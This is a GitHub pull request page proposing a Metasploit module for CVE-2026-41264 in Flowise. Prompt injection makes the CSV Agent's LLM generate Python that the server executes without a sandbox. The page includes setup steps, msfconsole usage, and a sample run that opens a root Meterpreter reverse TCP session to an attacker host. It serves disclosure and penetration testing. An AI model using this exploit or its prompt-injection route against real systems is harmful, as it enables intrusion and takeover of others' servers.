Skip to content

Add Flowise CSV Agent Prompt Injection RCE module (CVE-2026-41264)#21407

Open
Takahiro-Yoko wants to merge 1 commit intorapid7:masterfrom
Takahiro-Yoko:flowise_auth_rce_cve_2026_41264
Open

Add Flowise CSV Agent Prompt Injection RCE module (CVE-2026-41264)#21407
Takahiro-Yoko wants to merge 1 commit intorapid7:masterfrom
Takahiro-Yoko:flowise_auth_rce_cve_2026_41264

Conversation

@Takahiro-Yoko
Copy link
Copy Markdown
Contributor

@Takahiro-Yoko Takahiro-Yoko commented May 5, 2026

CVE-2026-41264
GHSA-3hjv-c53m-58jj

Vulnerable Application

This vulnerability allows remote attackers to execute arbitrary code on affected installations of FlowiseAI Flowise.
Authentication is not required to exploit this vulnerability.

The specific flaw exists within the run method of the CSV_Agents class.
The issue results from the lack of proper sandboxing when evaluating an LLM generated python script.
An attacker can leverage this vulnerability to execute code in the context of the user running the server.

The vulnerability affects:

*  flowise <= 3.0.13
*  flowise-components <= 3.0.13

This module was successfully tested on:

* flowise 3.0.13 installed with Docker

Installation

  1. docker run --name flowise -p 3000:3000 flowiseai/flowise:3.0.13

  2. On an attacker machine

curl -fsSL https://ollama.com/install.sh | sh
ollama run llama3.1
  1. Create API Key (need chatflows:create permission for exploit to work)
image

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/flowise_auth_rce_cve_2026_41264.rb
  4. Do: run lhost=<lhost> rhost=<rhost> apikey=<apikey> ollamaapiuri=<ollamaapiuri> model=<model>
  5. You should get a meterpreter

Scenarios

cmd/linux/http/x64/meterpreter_reverse_tcp

msf > use exploit/multi/http/flowise_auth_rce_cve_2026_41264.rb
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf exploit(multi/http/flowise_auth_rce_cve_2026_41264) > run apikey=<apikey> rhost=192.168.56.17 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434  model=llama3.1
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Flowise version 3.0.13 detected
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:33468) at 2026-05-05 14:09:24 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : acc229b14e46
OS           :  (Linux 6.8.0-52-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

Metasploit Kanban
Status: Todo

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@Takahiro-Yoko @smcintyre-r7